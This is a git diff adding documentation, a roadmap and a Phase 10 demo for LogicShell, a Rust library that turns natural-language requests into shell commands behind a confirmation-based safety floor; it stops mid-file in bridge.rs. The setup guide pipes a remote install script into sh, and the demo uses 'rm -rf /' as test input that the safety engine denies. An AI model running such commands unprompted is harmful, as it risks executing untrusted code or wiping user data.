diff --git a/LLM_GUIDE.md b/LLM_GUIDE.md new file mode 100644 index 0000000..477211d --- /dev/null +++ b/LLM_GUIDE.md @@ -0,0 +1,298 @@ +# LLM Guide — Running Ollama with LogicShell + +This guide explains how to run a local Ollama daemon alongside LogicShell so that the LLM bridge (Phase 10) can translate natural language into shell commands and suggest corrections for failed commands. + +--- + +## Prerequisites + +| Tool | Version | Purpose | +|:-----|:--------|:--------| +| Ollama | any | Local LLM daemon | +| Rust toolchain | 1.75+ | Building LogicShell | +| llama3 (or another model) | any | Language model for inference | + +--- + +## 1. Install Ollama + +```bash +# Linux / macOS +curl -fsSL https://ollama.ai/install.sh | sh + +# Or via package manager (macOS) +brew install ollama +``` + +Verify installation: + +```bash +ollama --version +``` + +--- + +## 2. Start the Ollama Daemon + +```bash +ollama serve +``` + +The daemon listens on `http://127.0.0.1:11434` by default. To use a different address, set: + +```bash +OLLAMA_HOST=0.0.0.0:11434 ollama serve +``` + +Verify the daemon is running: + +```bash +curl http://127.0.0.1:11434/api/tags +# Expected: {"models":[...]} +``` + +--- + +## 3. Pull a Model + +```bash +# Pull llama3 (default model in LogicShell config) +ollama pull llama3 + +# Or a smaller/faster model +ollama pull mistral +ollama pull codellama +``` + +List available models: + +```bash +ollama list +``` + +--- + +## 4. Configure LogicShell + +Create or update `.logicshell.toml` in your project root: + +```toml +schema_version = 1 +safety_mode = "balanced" # strict | balanced | loose + +[llm] +enabled = true +provider = "ollama" +base_url = "http://127.0.0.1:11434" +model = "llama3" # must match a pulled model +timeout_secs = 60 +allow_remote = false + +[llm.invocation] +nl_session = true # enable natural-language mode +assist_on_not_found = true # suggest corrections on exit 127 +max_context_chars = 8000 # combined prompt cap +``` + +--- + +## 5. 
Build LogicShell with Ollama Support + +The `ollama` feature flag enables `OllamaLlmClient` (requires `reqwest`): + +```bash +# Build with Ollama HTTP client +cargo build --workspace --features ollama + +# Run tests (includes mockito-backed Ollama tests) +cargo test --workspace --features ollama + +# Run the Phase 10 demo (no live Ollama required — uses a stub client) +cargo run --example phase10 --package logicshell-llm + +# Run the Phase 9 demo (health probe + optional live inference) +cargo run --example phase9 --package logicshell-llm --features ollama +``` + +--- + +## 6. Using LlmBridge in Your Code + +### Natural-language to command (NL session mode) + +```rust +use std::sync::Arc; +use logicshell_core::config::{LlmConfig, SafetyConfig, SafetyMode}; +use logicshell_llm::{LlmBridge, apply_ai_safety_floor}; + +#[cfg(feature = "ollama")] +use logicshell_llm::ollama::OllamaLlmClient; + +#[tokio::main] +async fn main() { + #[cfg(feature = "ollama")] + { + let config = LlmConfig { + enabled: true, + model: Some("llama3".into()), + ..LlmConfig::default() + }; + + let client = Arc::new( + OllamaLlmClient::new(&config.base_url, config.model.as_deref().unwrap(), config.timeout_secs) + ); + + let bridge = LlmBridge::from_config(client, &config).expect("bridge config valid"); + + // Translate natural language to a command + match bridge.translate_nl("list all rust files recursively").await { + Ok(proposed) => { + // AI-generated commands always return at least Decision::Confirm + let (assessment, decision) = proposed.evaluate_safety( + SafetyMode::Balanced, + &SafetyConfig::default(), + ); + println!("Suggested: {:?}", proposed.argv); + println!("Safety: {decision:?} (score: {})", assessment.score); + println!("Raw response: {:?}", proposed.raw_response); + // Dispatch only after user confirms... 
+ } + Err(e) => eprintln!("LLM error (falling back to manual): {e}"), + } + } +} +``` + +### Assist-on-127 (correction mode) + +```rust +// When a command returns exit code 127 (not found), ask the LLM for a correction +match bridge.assist_on_127(&["gti", "status"]).await { + Ok(proposed) => { + println!("Did you mean: {:?}", proposed.argv); + // Ask user to confirm before dispatching + } + Err(e) => eprintln!("Suggestion unavailable: {e}"), +} +``` + +### Health probe (check before using) + +```rust +#[cfg(feature = "ollama")] +{ + use logicshell_llm::ollama::{HealthStatus, OllamaLlmClient}; + + let client = OllamaLlmClient::new("http://127.0.0.1:11434", "llama3", 10); + match client.health_probe().await { + Ok(HealthStatus::Healthy) => println!("Ready"), + Ok(HealthStatus::ModelMissing) => println!("Run: ollama pull llama3"), + Ok(HealthStatus::UnexpectedStatus(n)) => println!("Daemon error: HTTP {n}"), + Err(e) => println!("Daemon unreachable: {e}"), + } +} +``` + +--- + +## 7. AI Safety Floor + +All commands produced by `LlmBridge` have `source: CommandSource::AiGenerated`. When evaluated through `ProposedCommand::evaluate_safety`, the safety floor is applied: + +| Base Decision | After AI Floor | +|:-------------|:--------------| +| `Allow` | `Confirm` | +| `Confirm` | `Confirm` | +| `Deny` | `Deny` | + +This means **AI-generated commands always require explicit user confirmation** — they are never silently dispatched, regardless of the safety mode. + +```rust +use logicshell_llm::{apply_ai_safety_floor, CommandSource}; +use logicshell_core::Decision; + +// Floor function can be applied standalone +let decision = apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated); +assert_eq!(decision, Decision::Confirm); +``` + +--- + +## 8. Graceful Degradation + +If Ollama is not running, `LlmBridge` returns `LlmError::Http`. 
Your application should fall back gracefully: + +```rust +match bridge.translate_nl("show disk usage").await { + Ok(proposed) => { /* use the proposed command */ } + Err(logicshell_llm::LlmError::Http(msg)) => { + eprintln!("LLM unavailable ({msg}), please enter command manually"); + // Fall back to manual input + } + Err(e) => eprintln!("Unexpected error: {e}"), +} +``` + +--- + +## 9. Running the Live Tests + +Tests that require a running Ollama daemon are tagged `#[ignore]`: + +```bash +# Run live Ollama tests (requires: ollama serve + ollama pull llama3) +cargo test --package logicshell-llm --features ollama -- --ignored + +# Run all tests including live +cargo test --workspace --features ollama -- --include-ignored +``` + +--- + +## 10. Troubleshooting + +| Problem | Solution | +|:--------|:---------| +| `LlmError::Http("connection refused")` | Start Ollama: `ollama serve` | +| `HealthStatus::ModelMissing` | Pull the model: `ollama pull llama3` | +| Slow responses | Increase `timeout_secs` in `[llm]` config | +| Wrong command suggestions | Try a larger model: `ollama pull llama3:70b` | +| Response not parsed | LLM returned explanation text — check `raw_response` and file an issue | +| `LlmError::ContextTooLarge` | Increase `max_context_chars` or shorten the NL input | + +--- + +## 11. Supported Models + +Any model available via `ollama pull` works. Recommended models for command generation: + +| Model | Size | Notes | +|:------|:-----|:------| +| `llama3` | 4.7 GB | Good balance of speed and accuracy | +| `codellama` | 3.8 GB | Optimized for code/shell commands | +| `mistral` | 4.1 GB | Fast and capable | +| `llama3:70b` | 39 GB | Highest accuracy, requires GPU | +| `phi3` | 2.3 GB | Lightweight, good on CPU | + +--- + +## 12. 
Configuration Reference + +```toml +[llm] +enabled = true # master switch (default: false) +provider = "ollama" # only supported provider in M3 +base_url = "http://127.0.0.1:11434" # Ollama daemon URL +model = "llama3" # model name (required when enabled) +timeout_secs = 60 # per-request HTTP timeout +allow_remote = false # must be false (MVP: local only) + +[llm.invocation] +nl_session = false # enable NL session mode +assist_on_not_found = false # suggest on exit 127 +max_context_chars = 8000 # combined prompt character cap +``` + +--- + +See [README.md](README.md) for the full project documentation and [CONTRIBUTING.md](CONTRIBUTING.md) for the TDD workflow. diff --git a/PLAN.md b/PLAN.md new file mode 100644 index 0000000..386008a --- /dev/null +++ b/PLAN.md @@ -0,0 +1,217 @@ +# LogicShell — Implementation Plan + +## Completed Milestones + +### M1 — Core Dispatcher + Config (Phases 1–5) ✅ + +| Phase | Feature | Status | +|:------|:--------|:-------| +| 1 | Workspace bootstrap, CI skeleton | ✅ | +| 2 | `LogicShellError` enum, project structure | ✅ | +| 3 | Config schema (`Config`, `LlmConfig`, etc.) 
| ✅ | +| 4 | Config discovery (env var, walk-up, XDG) | ✅ | +| 5 | Async `ProcessDispatcher` (tokio::process, stdout cap) | ✅ | + +### M2 — Safety, Audit, Hooks (Phases 6–7) ✅ + +| Phase | Feature | Status | +|:------|:--------|:-------| +| 6 | `AuditSink` (NDJSON, O_APPEND), `HookRunner`, `LogicShell` façade | ✅ | +| 7 | `SafetyPolicyEngine` (strict/balanced/loose, deny/allow lists, regexes) | ✅ | + +### M3 — LLM Bridge + Ollama (Phases 8–10) ✅ + +| Phase | Feature | Status | +|:------|:--------|:-------| +| 8 | `SystemContextProvider`, `PromptComposer`, `LlmClient` trait | ✅ | +| 9 | `OllamaLlmClient` (reqwest, health probe, mockito tests) | ✅ | +| 10 | `LlmBridge`, `ProposedCommand`, `CommandSource`, parser, AI safety floor | ✅ | + +**Current state:** 506 tests · 96%+ coverage · clippy clean · `cargo fmt` clean + +--- + +## M4 — Ratatui TUI (Phases 11–14) + +### Phase 11 — TUI foundation + +**Goal:** Introduce an interactive terminal UI shell powered by [Ratatui](https://ratatui.rs/) that wraps the `LogicShell` façade. The TUI is a thin presentation layer — all business logic stays in `logicshell-core` and `logicshell-llm`. + +**Deliverables:** +- New crate `logicshell-tui` in the workspace. +- `App` struct: terminal state machine with `Running` / `Quitting` lifecycle. +- Raw-mode terminal setup / teardown via `crossterm`. +- Minimal event loop: keyboard input (`Ctrl-C` / `q` to quit, `Enter` to submit). +- Configurable prompt widget showing current working directory. +- Static "welcome" layout with status bar (phase, version, safety mode). +- Unit-testable event dispatch without a real terminal (mock backend). + +**Tests:** App state machine, event routing, layout rendering to buffer. + +--- + +### Phase 12 — Command input + history + +**Goal:** Full-featured input line with readline-like editing and session history. + +**Deliverables:** +- `InputWidget` with cursor tracking, character insert/delete, Home/End. 
+- Arrow-key history navigation (in-memory `VecDeque`). +- Ctrl-A (beginning of line), Ctrl-E (end), Ctrl-K (kill to end). +- History persistence to `~/.local/share/logicshell/history` (one command per line, 1 000 entry cap). +- `HistoryStore` abstraction (sync, pure) — testable without the TUI. + +**Tests:** InputWidget cursor math, history ring-buffer, persistence round-trip. + +--- + +### Phase 13 — TUI dispatch + output panel + +**Goal:** Wire the TUI input to `LogicShell::dispatch` and display stdout/stderr in a scrollable panel. + +**Deliverables:** +- `OutputPanel` widget with ring buffer (configurable line cap, default 500). +- Dispatch stdout streamed line-by-line into the panel (no full capture in memory). +- Safety confirm dialog: when `Decision::Confirm`, show a modal overlay asking `[y/N]` before dispatching. +- Deny banner: red status bar when a command is blocked. +- Async dispatch on a separate Tokio task; TUI remains responsive during execution. +- Exit code / duration shown in the status bar after each command. + +**Tests:** OutputPanel scroll math, confirm dialog state, deny-banner render, dispatch-task cancellation. + +--- + +### Phase 14 — NL mode in TUI + LLM status widget + +**Goal:** Surface the Phase 10 `LlmBridge` inside the TUI with a first-class UX for AI-assisted command entry. + +**Deliverables:** +- Toggle NL mode with `Ctrl-L`; indicator in status bar (`NL` badge). +- In NL mode, input is sent to `LlmBridge::translate_nl` instead of directly dispatched. +- `LlmStatusWidget`: spinner during inference, health-probe result on startup. +- Proposed command shown in a preview pane before the confirm dialog. +- Keyboard shortcut `Ctrl-E` to edit the proposed command before confirming. +- Graceful degradation: if Ollama is down, fall back to direct dispatch with a warning. + +**Tests:** NL mode toggle, preview rendering, edit-before-confirm workflow, degradation path. 
+ +--- + +## M5 — Remote LLM Providers (Phases 15–17) + +### Phase 15 — Provider abstraction + +**Goal:** Refactor `LlmClient` into a provider-agnostic interface with runtime selection. + +**Deliverables:** +- `LlmProvider` enum extended: `Ollama`, `OpenAi`, `Anthropic`. +- `LlmClientFactory::build(config: &LlmConfig) -> Box` — dyn-compatible via `BoxFuture` wrapper. +- `allow_remote = true` validation: must be explicitly opted in; rejected in MVP paths. +- Provider selection stored in `Config` and surfaced in the TUI status bar. +- Feature flags: `openai` (reqwest + JSON), `anthropic` (reqwest + streaming SSE). + +**Tests:** Factory routing, allow_remote guard, feature-flag compile-time gating. + +--- + +### Phase 16 — OpenAI-compatible client + +**Goal:** Implement an `OpenAiLlmClient` targeting the OpenAI Chat Completions API. + +**Deliverables:** +- `POST /v1/chat/completions` with `{"model","messages":[{role,content}],"stream":false}`. +- API key from `OPENAI_API_KEY` env var; never in config file. +- Response: extract `choices[0].message.content`. +- Retry logic: exponential back-off on 429 (rate limit), up to 3 retries. +- Mockito test suite for happy path, 429 retry, 401 auth error. +- Live smoke test tagged `#[ignore]`. + +**Tests:** Wire-type deserialization, retry state machine, auth error propagation. + +--- + +### Phase 17 — Anthropic Claude client + +**Goal:** Implement an `AnthropicLlmClient` targeting the Messages API with prompt caching. + +**Deliverables:** +- `POST /v1/messages` with system prompt (OS context) as a `cache_control: ephemeral` block. +- Response: extract `content[0].text`. +- `cache_read_input_tokens` / `cache_creation_input_tokens` logged at TRACE level. +- `ANTHROPIC_API_KEY` env var; `anthropic-version` header pinned. +- Streaming disabled in MVP; non-streaming response only. +- Mockito suite + live `#[ignore]` test. + +**Tests:** Cache header sent, response extraction, cache metrics logged. 
+ +--- + +## M6 — Plugin System (Phases 18–20) + +### Phase 18 — Plugin trait + loader + +**Goal:** Allow third-party Rust crates (or WASM modules) to extend the dispatch pipeline with custom pre/post hooks and safety rules. + +**Deliverables:** +- `LogicShellPlugin` trait: `fn name(&self) -> &str`, `fn on_pre_dispatch(&self, argv: &[&str]) -> PluginDecision`, `fn on_post_dispatch(&self, argv: &[&str], exit: i32)`. +- `PluginRegistry`: runtime list of boxed plugins, iterated in registration order. +- `LogicShell::register_plugin(plugin: Box)`. +- Native plugin loading from a shared library via `libloading` (optional `plugin-native` feature). +- `PluginDecision::Allow | Deny(reason) | Passthrough`. + +**Tests:** Registry ordering, deny short-circuits dispatch, multiple plugin composition. + +--- + +### Phase 19 — WASM plugin sandbox + +**Goal:** Load plugins compiled to WebAssembly for cross-platform, sandboxed extensibility. + +**Deliverables:** +- `wasmtime`-backed `WasmPluginLoader` behind the `plugin-wasm` feature. +- ABI: plugins export `on_pre_dispatch(argv_json_ptr, len) -> i32` (0 = allow, 1 = deny). +- Resource limits: max memory 4 MiB, max execution time 50 ms (via `wasmtime::Limits`). +- `PluginManifest` (TOML): name, path, permissions, version. +- Sandbox escape prevention: no host filesystem or network access by default. + +**Tests:** ABI call, memory limit enforcement, timeout kill, manifest parsing. + +--- + +### Phase 20 — Plugin marketplace + CLI + +**Goal:** `logicshell-cli` binary with `plugin` subcommands for discovering and managing plugins. + +**Deliverables:** +- New crate `logicshell-cli` with `clap`-powered CLI. +- `logicshell plugin list` — show registered plugins and their versions. +- `logicshell plugin install ` — validate, copy, update config. +- `logicshell plugin remove ` — remove from config and filesystem. +- `logicshell plugin test ` — smoke-test a plugin against a configurable argv. 
+- Plugin directory: `$XDG_DATA_HOME/logicshell/plugins/`. +- Plugin signature verification (SHA-256 hash in manifest). + +**Tests:** CLI argument parsing, install/remove round-trip, signature check, path validation. + +--- + +## Coverage & Quality Gates (all milestones) + +| Check | Requirement | +|:------|:------------| +| `cargo fmt --check` | No diff | +| `cargo clippy --workspace --all-features -- -D warnings` | Zero warnings | +| `cargo test --workspace` | All pass, 0 ignored (except live-daemon tests) | +| `cargo tarpaulin --workspace` | ≥ 90% line coverage | +| `cargo build --workspace` | Zero warnings | + +--- + +## Architecture Principles + +1. **Library-first**: all user-facing features live in crates (`logicshell-core`, `logicshell-llm`, `logicshell-tui`). CLIs and TUIs are thin shells over library APIs. +2. **No LLM in hot paths**: `SafetyPolicyEngine` and `PromptComposer` are sync and pure — no async in critical policy paths (NFR-05). +3. **AI-generated commands always need confirmation**: `ProposedCommand::evaluate_safety` applies the AI safety floor regardless of safety mode. +4. **Feature flags**: `ollama`, `openai`, `anthropic`, `plugin-native`, `plugin-wasm` — pull in heavy dependencies only when needed. +5. **Zero real network in `cargo test`**: all HTTP-backed tests use mockito or mockall; live tests are `#[ignore]`. +6. **TDD discipline**: write the test first, make it pass, then refactor (red → green → clean). diff --git a/README.md b/README.md index 7eee577..2fdbbe4 100644 --- a/README.md +++ b/README.md @@ -21,7 +21,7 @@ LogicShell is a **library-first** Rust framework that sits between a host applic - **Append-only audit log** — every dispatch writes a NDJSON record (timestamp, cwd, argv, safety decision, optional note) that survives process restarts. - **Configuration discovery** — TOML config file resolved via `LOGICSHELL_CONFIG`, project walk-up, XDG, or built-in defaults, with strict unknown-key rejection. 
- **Safety policy engine** — `strict` / `balanced` / `loose` modes with deny/allow prefix lists, high-risk regex patterns, sudo heuristics, and a four-category risk taxonomy (destructive filesystem, privilege elevation, network, package). -- **Local LLM bridge** _(Phases 8–10, planned)_ — Ollama-backed natural-language-to-command translation, gated behind safety policy and explicit user confirmation. +- **Local LLM bridge** _(Phases 8–10)_ — Ollama-backed natural-language-to-command translation, gated behind safety policy and explicit user confirmation. AI-generated commands always require confirmation before dispatch. LogicShell is **not** a POSIX shell replacement. It is an embeddable dispatcher + policy + optional-AI stack that host applications link as a crate. @@ -33,11 +33,12 @@ LogicShell is **not** a POSIX shell replacement. It is an embeddable dispatcher |:----------|:-------|:-------| | **M1** — Dispatcher, config, CI | 1–5 | ✅ Complete | | **M2** — Safety engine, audit, hooks | 6–7 | ✅ Complete | -| **M3** — LLM bridge, Ollama | 8–10 | 📋 Planned | -| **M4** — Ratatui TUI | — | 📋 Planned | -| **M5** — Remote LLM providers | — | 📋 Planned | +| **M3** — LLM bridge, Ollama | 8–10 | ✅ Complete | +| **M4** — Ratatui TUI | 11–14 | 📋 Planned | +| **M5** — Remote LLM providers | 15–17 | 📋 Planned | +| **M6** — Plugin system | 18–20 | 📋 Planned | -**Current:** 294 tests · **98%+ line coverage** · `cargo clippy -D warnings` clean +**Current:** 506 tests · **96%+ line coverage** · `cargo clippy -D warnings` clean --- @@ -304,9 +305,9 @@ command = ["slack-notify", "deploying to prod"] timeout_ms = 3000 ``` -### 2. AI-assisted terminal (planned — Phase 8+) +### 2. AI-assisted terminal (Phase 10) -Enable `llm.invocation.assist_on_not_found = true` to have LogicShell query a local Ollama model when a command returns exit code 127. The suggested correction is presented for confirmation before running — never auto-executed. 
+Enable `llm.invocation.assist_on_not_found = true` to have LogicShell query a local Ollama model when a command returns exit code 127. The suggested correction is presented for confirmation before running — never auto-executed. AI-generated commands always receive a raised safety floor (`Allow` → `Confirm`). ```toml [llm] @@ -328,25 +329,28 @@ Run arbitrary scripts before every dispatch — health checks, secret injection, ## Next steps (roadmap) -### Phase 8 — LLM context + prompt composer +### ✅ Phase 8 — LLM context + prompt composer - `SystemContextProvider` — reads OS family, architecture, abbreviated PATH, cwd. - `PromptComposer` — pure, sync, templates via `include_str!`, enforces `max_context_chars`. - `LlmClient` async trait + `LlmRequest` / `LlmResponse` types. -- Build without the `ollama` feature; no HTTP deps in `logicshell-core`. -### Phase 9 — OllamaLlmClient +### ✅ Phase 9 — OllamaLlmClient - `OllamaLlmClient` behind the `ollama` feature flag using `reqwest`. - Health probe (`GET /api/tags`) with graceful degradation matrix. - Full mockito test suite; zero real network in default `cargo test`. -### Phase 10 — LlmBridge + AI-safety integration +### ✅ Phase 10 — LlmBridge + AI-safety integration -- `LlmBridge` orchestrates context → composer → client → parser → safety. -- `ProposedCommand` with `source: CommandSource::AiGenerated` raises the risk floor. -- NL session mode, argv-only mode, and assist-on-127 mode. -- Graceful degradation when Ollama is unreachable. +- `LlmBridge` generic orchestrator: context → composer → client → parser → `ProposedCommand`. +- `ProposedCommand` with `source: CommandSource::AiGenerated` raises the risk floor (`Allow` → `Confirm`). +- `parser::parse_command_response` — strips code fences, POSIX shell tokenizer. +- NL session mode (`translate_nl`) and assist-on-127 mode. +- Graceful degradation: `LlmError::Http` propagated for caller fallback. +- 96%+ coverage; 506 tests total. 
+ +See [LLM_GUIDE.md](LLM_GUIDE.md) for running Ollama alongside LogicShell. --- @@ -389,15 +393,30 @@ logicshell/ │ │ ├── hooks_audit_integration.rs │ │ └── e2e.rs # Full-stack end-to-end tests │ └── examples/ -│ └── demo.rs # Runnable feature demonstration +│ └── demo.rs # Runnable feature demonstration (Phases 3–7) ├── logicshell-llm/ # LLM bridge (Phases 8–10) -├── docs/ -│ ├── PLAN.md -│ ├── ARCHITECTURE.md -│ ├── TESTING_STRATEGY.md -│ ├── LOGICSHELL_OPERATIONS.md -│ ├── LogicShell Framework PRD.md -│ └── LogicShell LLM Module PRD.md +│ ├── src/ +│ │ ├── lib.rs # Re-exports for all public types +│ │ ├── client.rs # LlmClient trait + LlmRequest/LlmResponse (Phase 8) +│ │ ├── context.rs # SystemContextProvider + snapshot (Phase 8) +│ │ ├── prompt.rs # PromptComposer + templates (Phase 8) +│ │ ├── error.rs # LlmError enum +│ │ ├── ollama.rs # OllamaLlmClient (Phase 9, `ollama` feature) +│ │ ├── parser.rs # LLM response → argv tokenizer (Phase 10) +│ │ ├── proposed.rs # ProposedCommand + CommandSource + safety floor (Phase 10) +│ │ ├── bridge.rs # LlmBridge orchestrator (Phase 10) +│ │ └── templates/ +│ │ ├── nl_to_command.txt +│ │ └── assist_on_127.txt +│ ├── tests/ +│ │ ├── phase8_integration.rs +│ │ ├── phase9_integration.rs # (requires `ollama` feature) +│ │ └── phase10_integration.rs +│ └── examples/ +│ ├── phase8.rs # Phase 8 demo +│ ├── phase9.rs # Phase 9 demo (requires `ollama` feature) +│ └── phase10.rs # Phase 10 demo +├── LLM_GUIDE.md # Running Ollama + LogicShell together ├── tarpaulin.toml # Coverage config (gate: ≥ 90%) ├── rust-toolchain.toml # Pinned stable channel └── Cargo.toml # Workspace root diff --git a/logicshell-llm/examples/phase10.rs b/logicshell-llm/examples/phase10.rs new file mode 100644 index 0000000..384ad3f --- /dev/null +++ b/logicshell-llm/examples/phase10.rs @@ -0,0 +1,204 @@ +// Phase 10 demo: LlmBridge + AI-safety integration +// +// Shows the full pipeline: +// NL input → LlmBridge → ProposedCommand → safety evaluation → 
dispatch +// +// Usage (no Ollama required — uses an inline stub client): +// cargo run --example phase10 --package logicshell-llm +// +// With a live Ollama daemon: +// cargo run --example phase10 --package logicshell-llm --features ollama + +use std::sync::Arc; + +use logicshell_core::{ + config::{LlmConfig, SafetyConfig, SafetyMode}, + Decision, +}; +use logicshell_llm::{ + apply_ai_safety_floor, CommandSource, LlmBridge, LlmClient, LlmError, LlmRequest, LlmResponse, + ProposedCommand, +}; + +// ── Stub client used when Ollama is not running ─────────────────────────────── + +#[derive(Debug)] +struct StubClient { + fixed_response: String, +} + +impl StubClient { + fn new(response: impl Into) -> Arc { + Arc::new(Self { + fixed_response: response.into(), + }) + } +} + +impl LlmClient for StubClient { + async fn complete(&self, req: LlmRequest) -> Result { + Ok(LlmResponse { + text: self.fixed_response.clone(), + model: req.model, + }) + } +} + +#[tokio::main] +async fn main() { + println!("[Phase 10: LlmBridge construction]"); + + let bridge = LlmBridge::new(StubClient::new("ls -la"), "llama3", 8_000); + assert_eq!(bridge.model(), "llama3"); + println!(" model = {:?}", bridge.model()); + + // from_config — disabled LLM + let disabled_cfg = LlmConfig { + enabled: false, + ..LlmConfig::default() + }; + let err = LlmBridge::from_config(StubClient::new("ls"), &disabled_cfg).unwrap_err(); + println!(" disabled LLM returns: {err}"); + assert!(err.to_string().contains("disabled")); + println!(" construction assertions OK"); + + println!("[Phase 10: translate_nl — NL session mode]"); + + let bridge = LlmBridge::new(StubClient::new("ls -lhS"), "llama3", 8_000); + let proposed = bridge + .translate_nl("list files sorted by size") + .await + .expect("translate_nl failed"); + + assert_eq!(proposed.source, CommandSource::AiGenerated); + assert_eq!(proposed.argv[0], "ls"); + println!(" nl_input = \"list files sorted by size\""); + println!(" argv = {:?}", proposed.argv); + 
println!(" source = {:?}", proposed.source); + println!(" raw = {:?}", proposed.raw_response); + println!(" translate_nl OK"); + + println!("[Phase 10: assist_on_127 — typo correction mode]"); + + let bridge = LlmBridge::new(StubClient::new("git status"), "llama3", 8_000); + let proposed127 = bridge + .assist_on_127(&["gti", "status"]) + .await + .expect("assist_on_127 failed"); + + assert_eq!(proposed127.argv, vec!["git", "status"]); + assert_eq!(proposed127.source, CommandSource::AiGenerated); + println!(" failed_argv = [\"gti\", \"status\"]"); + println!(" suggested = {:?}", proposed127.argv); + println!(" assist_on_127 OK"); + + println!("[Phase 10: graceful degradation — unreachable daemon]"); + + #[derive(Debug)] + struct DownClient; + impl LlmClient for DownClient { + async fn complete(&self, _: LlmRequest) -> Result { + Err(LlmError::Http("connection refused".into())) + } + } + + let bridge_down = LlmBridge::new(Arc::new(DownClient), "llama3", 8_000); + match bridge_down.translate_nl("do something").await { + Err(LlmError::Http(msg)) => { + println!(" daemon down → graceful Http error: {msg}"); + } + other => panic!("expected Http error, got: {other:?}"), + } + println!(" graceful degradation OK"); + + println!("[Phase 10: AI safety floor — ProposedCommand raises risk]"); + + // Safe command (ls) is normally Allow, but AI raises it to Confirm. + let safe_proposed = ProposedCommand::new( + vec!["ls".into(), "-la".into()], + CommandSource::AiGenerated, + "ls -la", + ); + let (assessment, decision) = + safe_proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + println!(" command = {:?}", safe_proposed.argv); + println!(" risk_score = {}", assessment.score); + println!(" decision = {decision:?} (Allow raised to Confirm by AI floor)"); + assert_eq!( + decision, + Decision::Confirm, + "safe AI command must require user confirmation" + ); + + // Dangerous command stays Deny regardless. 
+ let dangerous_proposed = ProposedCommand::new( + vec!["rm".into(), "-rf".into(), "/".into()], + CommandSource::AiGenerated, + "rm -rf /", + ); + let (_, deny_decision) = + dangerous_proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + println!(" rm -rf / → decision = {deny_decision:?}"); + assert_eq!(deny_decision, Decision::Deny); + println!(" safety floor assertions OK"); + + println!("[Phase 10: apply_ai_safety_floor standalone]"); + assert_eq!( + apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated), + Decision::Confirm + ); + assert_eq!( + apply_ai_safety_floor(Decision::Confirm, &CommandSource::AiGenerated), + Decision::Confirm + ); + assert_eq!( + apply_ai_safety_floor(Decision::Deny, &CommandSource::AiGenerated), + Decision::Deny + ); + println!(" Allow → Confirm, Confirm → Confirm, Deny → Deny OK"); + + println!("[Phase 10: code-fence stripping in response]"); + + let bridge_fence = LlmBridge::new( + StubClient::new("```bash\nfind /tmp -name '*.log'\n```"), + "llama3", + 8_000, + ); + let fenced = bridge_fence + .translate_nl("find log files in tmp") + .await + .unwrap(); + println!(" argv = {:?}", fenced.argv); + assert_eq!(fenced.argv[0], "find"); + println!(" code-fence stripping OK"); + + // ── Optional: OllamaLlmClient path ─────────────────────────────────────── + + #[cfg(feature = "ollama")] + { + println!("[Phase 10: OllamaLlmClient bridge — health probe]"); + use logicshell_llm::ollama::{HealthStatus, OllamaLlmClient}; + + const BASE_URL: &str = "http://127.0.0.1:11434"; + const MODEL: &str = "llama3"; + + let ollama = Arc::new(OllamaLlmClient::new(BASE_URL, MODEL, 30)); + match ollama.health_probe().await { + Ok(HealthStatus::Healthy) => { + println!(" Ollama healthy — running live translate_nl"); + let bridge = LlmBridge::new(ollama, MODEL, 8_000); + match bridge + .translate_nl("list files in the current directory") + .await + { + Ok(p) => println!(" live response: {:?}", p.argv), + Err(e) => println!(" 
generate error (graceful): {e}"), + } + } + Ok(s) => println!(" Ollama not ready ({s:?}) — skipping live call"), + Err(e) => println!(" Ollama unreachable: {e} — skipping live call"), + } + } + + println!("\n✓ Phase 10 features verified OK"); +} diff --git a/logicshell-llm/src/bridge.rs b/logicshell-llm/src/bridge.rs new file mode 100644 index 0000000..bfd29b5 --- /dev/null +++ b/logicshell-llm/src/bridge.rs @@ -0,0 +1,326 @@ +// LlmBridge — Phase 10, LLM Module PRD §5.7 +// +// Orchestrates: SystemContextProvider → PromptComposer → LlmClient → parser +// → ProposedCommand. +// +// Three operational modes (FR-25, FR-26, FR-27): +// - `translate_nl` — natural-language session mode +// - `assist_on_127` — suggest a fix when a command returns exit 127 +// +// Graceful degradation (FR-24): any `LlmError::Http` from the client is +// propagated unchanged so callers can fall back to the non-AI path without +// panicking. +// +// The bridge is independent of the `ollama` feature; callers inject any +// `Arc` implementation. + +use std::sync::Arc; + +use logicshell_core::config::LlmConfig; + +use crate::{ + client::LlmClient, + context::SystemContextProvider, + error::LlmError, + parser::parse_command_response, + prompt::PromptComposer, + proposed::{CommandSource, ProposedCommand}, +}; + +/// Orchestrates the full LLM-to-command pipeline. +/// +/// Generic over the client type `C` (must implement [`LlmClient`]) so that +/// production code uses the concrete `OllamaLlmClient` and tests inject a +/// `MockLlmClient` — no `dyn` trait objects needed (async traits are not +/// dyn-compatible without boxing). +/// +/// Construct with [`LlmBridge::new`] (direct) or [`LlmBridge::from_config`] +/// (from a validated [`LlmConfig`]). All methods are `async` because +/// inference is I/O-bound (NFR-05). 
+#[derive(Debug)] +pub struct LlmBridge { + composer: PromptComposer, + client: Arc, + context_provider: SystemContextProvider, +} + +impl LlmBridge { + /// Construct a bridge directly with a model name and context cap. + /// + /// Use [`LlmBridge::from_config`] when a validated [`LlmConfig`] is + /// available; use this constructor in tests or when the config is not + /// available. + pub fn new(client: Arc, model: impl Into, max_context_chars: usize) -> Self { + Self { + composer: PromptComposer::new(model, max_context_chars), + client, + context_provider: SystemContextProvider::new(), + } + } + + /// Construct a bridge from an [`LlmConfig`], returning errors for disabled + /// or misconfigured LLM settings. + pub fn from_config(client: Arc, config: &LlmConfig) -> Result { + let composer = PromptComposer::from_config(config)?; + Ok(Self { + composer, + client, + context_provider: SystemContextProvider::new(), + }) + } + + /// The model name this bridge sends in every request. + pub fn model(&self) -> &str { + self.composer.model() + } + + /// Translate a natural-language description into a [`ProposedCommand`]. + /// + /// Pipeline: snapshot → compose_nl_to_command → complete → parse. + /// + /// # Errors + /// + /// - `LlmError::ContextTooLarge` if the rendered prompt exceeds the cap. + /// - `LlmError::Http` if the daemon is unreachable (graceful degradation). + /// - `LlmError::Parse` if the model response cannot be tokenized. + pub async fn translate_nl(&self, nl_input: &str) -> Result { + let snap = self.context_provider.snapshot(); + let req = self.composer.compose_nl_to_command(nl_input, &snap)?; + let resp = self.client.complete(req).await?; + let argv = parse_command_response(&resp.text)?; + Ok(ProposedCommand::new( + argv, + CommandSource::AiGenerated, + resp.text, + )) + } + + /// Suggest a corrected command when the original returned exit code 127. + /// + /// Pipeline: 